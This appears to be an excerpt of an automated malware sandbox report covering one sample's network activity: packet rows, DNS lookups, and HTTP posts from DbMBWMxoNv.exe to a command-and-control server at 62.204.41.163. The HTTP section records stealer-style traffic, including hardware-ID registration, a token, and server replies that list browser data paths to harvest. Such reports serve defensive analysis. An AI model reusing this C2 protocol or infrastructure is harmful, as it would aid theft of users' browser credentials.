Nov 2, 2024 17:57:01.682339907 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.682343006 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.682353020 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.682363033 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.682364941 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.682375908 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.682380915 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.682408094 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.682431936 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.682693005 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.682704926 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.682715893 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.682727098 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.682740927 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.682753086 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.682764053 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.682766914 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.682780027 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.682787895 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.682806969 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.682831049 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.683016062 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.683027983 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.683047056 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.683060884 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.683063030 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.683073997 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.683084965 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.683092117 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.683099985 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.683103085 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.683109999 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.683135033 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.683149099 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.683275938 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.683336020 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.683391094 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.683460951 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.683473110 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.683491945 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.683506966 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.683511019 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.683514118 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.683523893 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.683537006 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.683537960 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.683552027 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.683562040 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.683564901 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.683577061 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.683585882 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.683589935 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.683604002 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.683615923 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.683615923 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.683629990 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.683634043 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.683643103 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.683655024 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.683662891 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.683669090 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.683680058 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.683690071 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.683710098 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.683717012 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.684118032 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.684128046 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.684138060 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.684151888 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.684165001 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.684195995 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.712627888 CET	443	50023	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:01.722421885 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.722438097 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.722501040 CET	80	49933	62.204.41.163	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 2, 2024 17:56:29.929999113 CET	192.168.2.7	1.1.1.1	0x80ec	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Nov 2, 2024 17:56:29.930727959 CET	192.168.2.7	1.1.1.1	0xa6c	Standard query (0)	www.google.com	65	IN (0x0001)	false
Nov 2, 2024 17:56:35.905215025 CET	192.168.2.7	1.1.1.1	0x389a	Standard query (0)	apis.google.com	A (IP address)	IN (0x0001)	false
Nov 2, 2024 17:56:35.905544043 CET	192.168.2.7	1.1.1.1	0x6cd	Standard query (0)	apis.google.com	65	IN (0x0001)	false
Nov 2, 2024 17:56:36.491713047 CET	192.168.2.7	1.1.1.1	0xabd	Standard query (0)	play.google.com	A (IP address)	IN (0x0001)	false
Nov 2, 2024 17:56:36.492173910 CET	192.168.2.7	1.1.1.1	0x4ee9	Standard query (0)	play.google.com	65	IN (0x0001)	false
Nov 2, 2024 17:56:40.880400896 CET	192.168.2.7	1.1.1.1	0x404d	Standard query (0)	ntp.msn.com	A (IP address)	IN (0x0001)	false
Nov 2, 2024 17:56:40.880795002 CET	192.168.2.7	1.1.1.1	0xf368	Standard query (0)	ntp.msn.com	65	IN (0x0001)	false
Nov 2, 2024 17:56:42.095793009 CET	192.168.2.7	1.1.1.1	0x25d0	Standard query (0)	bzib.nelreports.net	A (IP address)	IN (0x0001)	false
Nov 2, 2024 17:56:42.096093893 CET	192.168.2.7	1.1.1.1	0x8687	Standard query (0)	bzib.nelreports.net	65	IN (0x0001)	false
Nov 2, 2024 17:56:44.133388042 CET	192.168.2.7	1.1.1.1	0x2206	Standard query (0)	assets.msn.com	A (IP address)	IN (0x0001)	false
Nov 2, 2024 17:56:44.133542061 CET	192.168.2.7	1.1.1.1	0x95f	Standard query (0)	assets.msn.com	65	IN (0x0001)	false
Nov 2, 2024 17:56:44.255804062 CET	192.168.2.7	1.1.1.1	0x66e8	Standard query (0)	sb.scorecardresearch.com	A (IP address)	IN (0x0001)	false
Nov 2, 2024 17:56:44.255943060 CET	192.168.2.7	1.1.1.1	0x85de	Standard query (0)	sb.scorecardresearch.com	65	IN (0x0001)	false
Nov 2, 2024 17:56:44.265614033 CET	192.168.2.7	1.1.1.1	0x7573	Standard query (0)	c.msn.com	A (IP address)	IN (0x0001)	false
Nov 2, 2024 17:56:44.265907049 CET	192.168.2.7	1.1.1.1	0x640b	Standard query (0)	c.msn.com	65	IN (0x0001)	false
Nov 2, 2024 17:56:44.276932001 CET	192.168.2.7	1.1.1.1	0xf557	Standard query (0)	api.msn.com	A (IP address)	IN (0x0001)	false
Nov 2, 2024 17:56:44.277086020 CET	192.168.2.7	1.1.1.1	0xc3ec	Standard query (0)	api.msn.com	65	IN (0x0001)	false
Nov 2, 2024 17:56:44.880213022 CET	192.168.2.7	1.1.1.1	0x6335	Standard query (0)	clients2.googleusercontent.com	A (IP address)	IN (0x0001)	false
Nov 2, 2024 17:56:44.880366087 CET	192.168.2.7	1.1.1.1	0x93c8	Standard query (0)	clients2.googleusercontent.com	65	IN (0x0001)	false
Nov 2, 2024 17:56:45.526309967 CET	192.168.2.7	1.1.1.1	0xf7d4	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 2, 2024 17:56:45.526554108 CET	192.168.2.7	1.1.1.1	0xef1d	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 2, 2024 17:56:45.543462038 CET	192.168.2.7	1.1.1.1	0x8bc1	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 2, 2024 17:56:45.544014931 CET	192.168.2.7	1.1.1.1	0x870	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 2, 2024 17:56:45.651037931 CET	192.168.2.7	1.1.1.1	0x824b	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 2, 2024 17:56:45.651254892 CET	192.168.2.7	1.1.1.1	0xf33d	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 2, 2024 17:56:29.938535929 CET	1.1.1.1	192.168.2.7	0x80ec	No error (0)	www.google.com		142.250.186.132	A (IP address)	IN (0x0001)	false
Nov 2, 2024 17:56:29.939060926 CET	1.1.1.1	192.168.2.7	0xa6c	No error (0)	www.google.com			65	IN (0x0001)	false
Nov 2, 2024 17:56:35.911988974 CET	1.1.1.1	192.168.2.7	0x389a	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 2, 2024 17:56:35.911988974 CET	1.1.1.1	192.168.2.7	0x389a	No error (0)	plus.l.google.com		142.250.186.46	A (IP address)	IN (0x0001)	false
Nov 2, 2024 17:56:35.913336992 CET	1.1.1.1	192.168.2.7	0x6cd	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 2, 2024 17:56:36.498586893 CET	1.1.1.1	192.168.2.7	0xabd	No error (0)	play.google.com		216.58.206.78	A (IP address)	IN (0x0001)	false
Nov 2, 2024 17:56:40.887319088 CET	1.1.1.1	192.168.2.7	0x404d	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 2, 2024 17:56:40.888417959 CET	1.1.1.1	192.168.2.7	0xf368	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 2, 2024 17:56:40.890523911 CET	1.1.1.1	192.168.2.7	0x297b	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 2, 2024 17:56:40.890523911 CET	1.1.1.1	192.168.2.7	0x297b	No error (0)	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		94.245.104.56	A (IP address)	IN (0x0001)	false
Nov 2, 2024 17:56:40.904863119 CET	1.1.1.1	192.168.2.7	0x26e7	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 2, 2024 17:56:42.102566957 CET	1.1.1.1	192.168.2.7	0x25d0	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 2, 2024 17:56:42.103344917 CET	1.1.1.1	192.168.2.7	0x8687	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 2, 2024 17:56:44.140532970 CET	1.1.1.1	192.168.2.7	0x2206	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 2, 2024 17:56:44.140780926 CET	1.1.1.1	192.168.2.7	0x95f	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 2, 2024 17:56:44.263119936 CET	1.1.1.1	192.168.2.7	0x66e8	No error (0)	sb.scorecardresearch.com		18.244.18.27	A (IP address)	IN (0x0001)	false
Nov 2, 2024 17:56:44.263119936 CET	1.1.1.1	192.168.2.7	0x66e8	No error (0)	sb.scorecardresearch.com		18.244.18.32	A (IP address)	IN (0x0001)	false
Nov 2, 2024 17:56:44.263119936 CET	1.1.1.1	192.168.2.7	0x66e8	No error (0)	sb.scorecardresearch.com		18.244.18.38	A (IP address)	IN (0x0001)	false
Nov 2, 2024 17:56:44.263119936 CET	1.1.1.1	192.168.2.7	0x66e8	No error (0)	sb.scorecardresearch.com		18.244.18.122	A (IP address)	IN (0x0001)	false
Nov 2, 2024 17:56:44.272329092 CET	1.1.1.1	192.168.2.7	0x7573	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 2, 2024 17:56:44.273227930 CET	1.1.1.1	192.168.2.7	0x640b	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 2, 2024 17:56:44.283963919 CET	1.1.1.1	192.168.2.7	0xf557	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 2, 2024 17:56:44.285609007 CET	1.1.1.1	192.168.2.7	0xc3ec	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 2, 2024 17:56:44.890990973 CET	1.1.1.1	192.168.2.7	0x6335	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 2, 2024 17:56:44.890990973 CET	1.1.1.1	192.168.2.7	0x6335	No error (0)	googlehosted.l.googleusercontent.com		172.217.16.129	A (IP address)	IN (0x0001)	false
Nov 2, 2024 17:56:44.892710924 CET	1.1.1.1	192.168.2.7	0x93c8	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 2, 2024 17:56:45.533416986 CET	1.1.1.1	192.168.2.7	0xf7d4	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 2, 2024 17:56:45.533416986 CET	1.1.1.1	192.168.2.7	0xf7d4	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 2, 2024 17:56:45.533433914 CET	1.1.1.1	192.168.2.7	0xef1d	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 2, 2024 17:56:45.552000999 CET	1.1.1.1	192.168.2.7	0x8bc1	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 2, 2024 17:56:45.552000999 CET	1.1.1.1	192.168.2.7	0x8bc1	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 2, 2024 17:56:45.553082943 CET	1.1.1.1	192.168.2.7	0x870	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 2, 2024 17:56:45.657813072 CET	1.1.1.1	192.168.2.7	0x824b	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 2, 2024 17:56:45.657813072 CET	1.1.1.1	192.168.2.7	0x824b	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 2, 2024 17:56:45.658257008 CET	1.1.1.1	192.168.2.7	0xf33d	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49700	62.204.41.163	80	6456	C:\Users\user\Desktop\DbMBWMxoNv.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 17:56:19.949311018 CET	88	OUT	GET / HTTP/1.1 Host: 62.204.41.163 Connection: Keep-Alive Cache-Control: no-cache
Nov 2, 2024 17:56:20.818119049 CET	203	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:20 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 2, 2024 17:56:20.820760965 CET	420	OUT	POST /c882d91d1df1bdb3.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHCAKKEGCAAFHJJJDBKJ Host: 62.204.41.163 Content-Length: 220 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 38 41 43 39 37 33 45 38 34 35 39 32 33 39 38 39 38 39 30 30 39 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 4a 2d 2d 0d 0a Data Ascii: ------GHCAKKEGCAAFHJJJDBKJContent-Disposition: form-data; name="hwid"78AC973E84592398989009------GHCAKKEGCAAFHJJJDBKJContent-Disposition: form-data; name="build"default10_cap------GHCAKKEGCAAFHJJJDBKJ--
Nov 2, 2024 17:56:21.148781061 CET	407	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:20 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4d 32 4d 35 5a 54 4d 31 4f 44 4d 7a 4d 7a 4d 31 5a 6a 67 34 4d 32 49 34 4d 44 45 35 4e 7a 56 6c 59 7a 42 6a 5a 44 6b 32 4f 47 55 77 4d 6d 46 6a 4e 7a 63 32 5a 6a 63 78 4e 6a 56 6b 5a 6a 55 77 4e 6d 4d 34 4e 47 52 68 4e 44 4a 68 4e 6d 46 6a 5a 44 46 68 4f 47 55 7a 4f 44 64 6b 5a 47 49 7a 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 46 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 42 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: M2M5ZTM1ODMzMzM1Zjg4M2I4MDE5NzVlYzBjZDk2OGUwMmFjNzc2ZjcxNjVkZjUwNmM4NGRhNDJhNmFjZDFhOGUzODdkZGIzfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDF8MHwxfDF8MXwxfDB8MXwwfHlibmNiaHlsZXBtZXw=
Nov 2, 2024 17:56:21.150626898 CET	468	OUT	POST /c882d91d1df1bdb3.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBAKKFHJDBKKEBFHDAAE Host: 62.204.41.163 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 42 41 4b 4b 46 48 4a 44 42 4b 4b 45 42 46 48 44 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 63 39 65 33 35 38 33 33 33 33 35 66 38 38 33 62 38 30 31 39 37 35 65 63 30 63 64 39 36 38 65 30 32 61 63 37 37 36 66 37 31 36 35 64 66 35 30 36 63 38 34 64 61 34 32 61 36 61 63 64 31 61 38 65 33 38 37 64 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 4b 4b 46 48 4a 44 42 4b 4b 45 42 46 48 44 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 4b 4b 46 48 4a 44 42 4b 4b 45 42 46 48 44 41 41 45 2d 2d 0d 0a Data Ascii: ------EBAKKFHJDBKKEBFHDAAEContent-Disposition: form-data; name="token"3c9e35833335f883b801975ec0cd968e02ac776f7165df506c84da42a6acd1a8e387ddb3------EBAKKFHJDBKKEBFHDAAEContent-Disposition: form-data; name="message"browsers------EBAKKFHJDBKKEBFHDAAE--
Nov 2, 2024 17:56:21.415648937 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:21 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 2064 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 51 7a 70 63 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 58 45 64 76 62 32 64 73 5a 56 78 63 51 32 68 79 62 32 31 6c 58 46 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 63 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 4d 48 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 44 42 38 51 57 31 70 5a 32 39 38 58 45 46 74 61 57 64 76 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8QzpcXFByb2dyYW0gRmlsZXNcXEdvb2dsZVxcQ2hyb21lXFxBcHBsaWNhdGlvblxcfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8MHxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfDB8QW1pZ298XEFtaWdvXFVzZXIgRGF0YXxjaHJvbWV8MHwwfFRvcmNofFxUb3JjaFxVc2VyIERhdGF8Y2hyb21lfDB8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8JUxPQ0FMQVBQREFUQSVcXFZpdmFsZGlcXEFwcGxpY2F0aW9uXFx8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8MHxFcGljUHJpdmFjeUJyb3dzZXJ8XEVwaWMgUHJpdmFjeSBCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8ZXBpYy5leGV8JUxPQ0FMQVBQREFUQSVcXEVwaWMgUHJpdmFjeSBCcm93c2VyXFxBcHBsaWNhdGlvblxcfENvY0NvY3xcQ29jQ29jXEJyb3dzZXJcVXNlciBEYXRhfGNocm9tZXxicm93c2VyLmV4ZXxDOlxcUHJvZ3JhbSBGaWxlc1xcQ29jQ29jXFxCcm93c2VyXFxBcHBsaWNhdGlvblxcfEJyYXZlfFxCcmF2ZVNvZnR3YXJlXEJyYXZlLUJyb3dzZXJcVXNlciBEYXRhfGNocm9tZXxicmF2ZS5leGV8QzpcXFByb2dyYW0gRmlsZXNcXEJyYXZlU29mdHdhcmVcXEJyYXZlLUJyb3dz
Nov 2, 2024 17:56:21.415672064 CET	1056	IN	Data Raw: 5a 58 4a 63 58 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 58 46 78 38 51 32 56 75 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 Data Ascii: ZXJcXEFwcGxpY2F0aW9uXFx8Q2VudCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8JUxPQ0FMQVBQREFUQSVcXENlbnRCcm93c2VyXFxBcHBsaWNhdGlvblxcfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfDB8MHxDaGVkb3QgQnJvd3NlcnxcQ2hlZG90XFVzZXI
Nov 2, 2024 17:56:21.417169094 CET	467	OUT	POST /c882d91d1df1bdb3.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHIJEHJDHJKECBFHDHDH Host: 62.204.41.163 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 48 49 4a 45 48 4a 44 48 4a 4b 45 43 42 46 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 63 39 65 33 35 38 33 33 33 33 35 66 38 38 33 62 38 30 31 39 37 35 65 63 30 63 64 39 36 38 65 30 32 61 63 37 37 36 66 37 31 36 35 64 66 35 30 36 63 38 34 64 61 34 32 61 36 61 63 64 31 61 38 65 33 38 37 64 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 45 48 4a 44 48 4a 4b 45 43 42 46 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 45 48 4a 44 48 4a 4b 45 43 42 46 48 44 48 44 48 2d 2d 0d 0a Data Ascii: ------DHIJEHJDHJKECBFHDHDHContent-Disposition: form-data; name="token"3c9e35833335f883b801975ec0cd968e02ac776f7165df506c84da42a6acd1a8e387ddb3------DHIJEHJDHJKECBFHDHDHContent-Disposition: form-data; name="message"plugins------DHIJEHJDHJKECBFHDHDH--
